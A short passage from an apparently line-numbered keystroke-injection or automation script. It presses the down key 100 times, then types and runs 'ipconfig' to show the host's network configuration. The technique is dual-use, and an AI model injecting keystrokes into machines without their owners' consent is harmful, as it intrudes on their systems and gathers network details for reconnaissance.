m"); 15 | delay(500); 16 | for (var i = 0; i<100; i++){ 17 | press("down")+i 18 | } 19 | press("ENTER"); 20 | type("ipconfig"); 21 | press("ENTER"); 22 | delay(1000); 23 | --------------------------------------------------------------------------------